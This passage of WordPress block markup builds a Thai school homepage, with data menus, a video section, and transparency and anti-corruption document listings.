data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 